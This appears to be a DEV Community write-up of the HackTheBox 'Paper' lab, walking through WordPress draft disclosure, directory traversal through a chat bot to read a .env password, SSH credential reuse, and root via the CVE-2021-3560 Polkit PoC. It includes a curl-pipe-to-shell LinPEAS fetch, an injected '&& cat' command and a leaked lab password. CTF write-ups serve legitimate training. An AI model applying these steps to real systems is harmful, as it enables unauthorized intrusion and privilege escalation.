DEV Community

Cover image for HTB - Paper (Writeup)
brydr
brydr

Posted on

HTB - Paper (Writeup)

by brydr

Paper is a fairly straightforward, easy box created by @secnigma. In this writeup, I will show you how to crack it and gain root privileges.

  • OS: Linux
  • Difficulty: Easy

Reconnaissance

Rustscan

First, we will be checking for open ports. I will be using rustscan here (because it's fast, and it's basically the Rust implementation of nmap), but you are free to choose whatever port scanner you like.

Just put the IP of your HTB instance on the designated placeholders. In my case, it's 10.10.11.143.

rustscan --range 0-65535 -a <ip_of_your_htb_instance>

Enter fullscreen mode Exit fullscreen mode

Rustscan Result

We found that ports 22, 80, and 443 are open.

Let's check them out on nmap:

Nmap

nmap -A -p 22,80,443 <ip_of_your_htb_instance> --script vuln -T4 -vvv
Enter fullscreen mode Exit fullscreen mode
  • SSH
    Nmap - SSH

  • HTTP
    Nmap - HTTP

  • HTTPS
    Nmap - HTTPS

Nikto

The results were not satisfactory. Let's try another tool. Maybe nikto will find something more interesting.

nikto -host <ip_of_your_htb_instance>
Enter fullscreen mode Exit fullscreen mode

Take a look at the header 'x-backend-server'.
Nikto scan result

Maybe we can use that as a hostname for the IP of our target. So, open your favorite text editor and edit your hosts file by adding:

<ip_of_your_htb_instance>     office.paper
Enter fullscreen mode Exit fullscreen mode

Nmap

Let's try scanning again, but now using office.paper instead of the target's IP.

nmap -A -p 22,80,443 office.paper --script vuln -T4 -vvv
Enter fullscreen mode Exit fullscreen mode

Running the command above would give us a different result on port 80 (HTTP):

Nmap Scan with Hostname

Our Nmap scan also gave us a list of the users found. Let's take note of that.

WPScan

So the website is using Wordpress. Having said that, we are going to use WPScan. But before that, make sure that you have already acquired your API token before using WPScan or you will never be able to utilize the scanner. You can get your own API token by signing up on their website.

WPScan Banner

On default Kali installations, wpscan is normally included, but just in case you do not have one installed on your VM, just enter sudo apt update && sudo apt install wpscan -y on your terminal.

Once you have acquired your API token, go to your terminal and type this:

export WPSCAN_TOKEN='<your_wpscan_api_token>'
Enter fullscreen mode Exit fullscreen mode

After that, run wpscan on your terminal:

wpscan --url office.paper --api-token $WPSCAN_TOKEN
Enter fullscreen mode Exit fullscreen mode

While the scan is running, let's explore the website a little bit.

Office.paper Homepage

In one of the posts, there is an interesting comment made by a user named Nick. Take note of that.

Initial Foothold

Let's return to our wpscan and check what we got:

WPScan Result

As we can see, wpscan detected a lot of vulnerabilities. We are not an authenticated user, so we have to look for ways to enter the website and gain foothold.

Among the results, there is an interesting finding regarding a bug that allows an unauthenticated user to view draft posts. Remember the comment made by Nick that we saw earlier about the secret content in the drafts? Maybe we can use that to gain initial foothold.

WPScan Result 2

In one of the links included in the vulnerability scan result, Sebastian Neef provides an excellent proof of concept of the said bug.

According to the blog, adding some certain query parameters to the base url will show the hidden content. Let's check it out using these query params:
http://office.paper/?static=1&orderBy=asc&m=YYYYMMDD

Secret Link

We are able to view the supposedly hidden draft, and there is a seemingly interesting private link included. Going to the link right away will lead us to nowhere. We need to add it first to our hosts file, just like what we did earlier.

Hosts file configuration

Upon reaching the sign up page for Rocket Chat, we will try to sign up in their private chat system.

Rocket Chat

A successful registration leads us to the "general", the main channel in the chat system. Here we can see the conversations of different users, including their developer, Dwight.

Dwight apparently had created a chat bot named Recyclops inside the chat system. The bot requires some commands to which it responds to. Let's take a deeper look on what this bot can do.

Bot Help 1

Bot Help 2

These are some of the commands the bot is using:

  1. Show the help menu:

    recyclops help

  2. List files in a directory:

    recyclops list <directory_name>

  3. Get the file and print its contents:

    recyclops file <file_location>

There are some limitations to our user account in the chat system. We cannot reply in the "general" channel. The bot's help menu says the file and list commands are only limited to the "sales" folder. This means we're not supposed to have access to the other files within the server. Or so we thought.

So we have a command that accepts a path. Maybe we can try a directory traversal attack. But how can we do that if we can't even reply in the channel? Let's try sending direct message to some users.

DM 1

DM 2

Why don't we try sending a direct message to Recyclops itself, right?

Sending the command recyclops list . resulted to this:

DM 3

Notice the dot on the previous file command. Doing some directory traversal using recyclops list ./../ would result to this:

Directory Traversal 1

Directory Traversal 2

Remember the OS that was detected on our nmap and nikto scan? It was CentOS right? Well, the result above looks like a home directory in Linux. The user.txt flag is actually already there. Let's try printing its value.

recyclops file ./../user.txt
Enter fullscreen mode Exit fullscreen mode

Access denied

We got an "Access denied" response. That's because we do not own the file.

How about putting some other OS commands?

recyclops list ./../ && cat user.txt
Enter fullscreen mode Exit fullscreen mode

OS Commands Not Allowed

Denied again. Hmmmmmmmm. Maybe we need to enumerate some more. Using the same command that we used to view the /home directory, let's check the other files and directories.

recyclops list ./../
Enter fullscreen mode Exit fullscreen mode

Directory Traversal 3

The folder named hubot seems interesting. We should take a look inside it.

recyclops list ./../hubot
Enter fullscreen mode Exit fullscreen mode

Directory Traversal 4

From here, we can actually check the package.json if there are exisiting vulnerabilities in this Node.js app. But there is a juicier file that is present in this directory. Let's take a look at the .env file.

export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Queenofblad3s!23
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1
Enter fullscreen mode Exit fullscreen mode

See the values for ROCKETCHAT_USER and ROCKETCHAT_PASSWORD? These are the credentials for Recyclops, we should try logging in using those. Let's log out and use the bot's credentials.

Bot Login Not Allowed

Ooops. We kinda hit a wall there. Hmmmmmmmmmmmmm. Let's think of other ways to pwn this server. Hmmmmmmmmmmmmm.........

Maybe we could try some credential stuffing/password spraying?

Remember the owner of the files that we saw when we did our directory traversal? That was Dwight, right? So let's try using his username and the password that we found on the .env file of hubot. Let's SSH into the server:

ssh dwight@10.10.11.143
Enter fullscreen mode Exit fullscreen mode

Enter the password upon prompt.

SSH Login

It worked!

From here, we could simply print the user.txt flag and submit it. I'll leave that to you as an exercise.

Privilege Escalation

Now, we need to get the flag for root. For that, we need to do some privilege escalation.

My go-to tool for Linux privilege escalation is LinPEAS. LinPEAS provides suggestions on how you could escalate your privileges to root.

Let's check if we have cURL installed on the target server first, otherwise we will have to manually download the LinPEAS script there, set it as an executable (chmod +x) and run it.

which curl
Enter fullscreen mode Exit fullscreen mode

cURL Check

Good. cURL is installed in the server. Now, what we need to do is just copy and paste the command as described in the Github repo.

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
Enter fullscreen mode Exit fullscreen mode

If the command above doesn't work for you, then we will have to download LinPEAS on our attack machine first, then transfer it using Python's HTTP Server.

Go to the releases page of LinPEAS and download linpeas.sh. After that, we need to setup an HTTP Server using Python. Please refer to the following commands below for the different ways to set it up:

Python 2

python -m SimpleHTTPServer <port_number>
Enter fullscreen mode Exit fullscreen mode

Python 3

python3 -m http.server <port_number>
Enter fullscreen mode Exit fullscreen mode

Make sure that the LinPEAS script is in the directory where you have set your HTTP Server up.

Since I have Python 3 installed in my Kali, I will be using this command python3 -m http.server 7000, with 7000 as my port.

After that, check your IP address on your attack machine using ip a. Look for the tun0 interface. (Most of the time it is named tun0. If you have other connections on your VPN, then yours might be different). Copy the IP address that was indicated in your interface, excluding the subnet (e.g. /23).

IP Address

Go back to SSH session that we logged in to earlier. Navigate to the /tmp folder using cd. Type the following command:

curl http://<your_attack_machine_ip_address>:<port_number_on_your_http_server>/linpeas.sh --output linpeas.sh
Enter fullscreen mode Exit fullscreen mode

LinPEAS File Transfer Using Python 3 HTTP Server

Use chmod +x ./linpeas.sh so that we can run the script.
LinPEAS chmod +x

Let's run LinPEAS!

./linpeas.sh
Enter fullscreen mode Exit fullscreen mode

This will take a while.

If we take a look at the description, there are different colors which indicates the chances of getting a privilege escalation. What we are interested in is the one with the RED/YELLOW color. Let's take a look at the result:

CVE-2021-3560

It says that the server is vulnerable to CVE-2021-3560. This vulnerability exploits the flaw in PolKit (policy kit) which allows an attacker to create a new superadmin. Let's look for exploits that are in the wild.

CVE-2021-3560 PoC

@secnigma has actually written a PoC (proof-of-concept) for this. Let's copy the contents, and paste it on the server using vim.

If you do not know how to use vim, try learning it, I'll leave it to you as an exercise.

vim poc.sh
Enter fullscreen mode Exit fullscreen mode

poc.sh

Tip: In the poc.sh script, you can change the username and password of the account that will be created when we you run the script. By default, the username is secnigma and the password is secnigmaftw.

Change Username and Password

Exit vim, and change the type of poc.sh to executable. After that, run the script using ./poc.sh.

chmod poc.sh

I've set my username as brydr and the password as strongPasswordWow. If the PoC execution was successful, it would look like this:

PoC Success

From there, you can just change the user to the one you have created using the Polkit exploit PoC, then run sudo bash.
I'll leave it to you on how to get the root flag, which is stored in root.txt.

Thanks for reading my writeup. Happy hacking!

Discussion (0)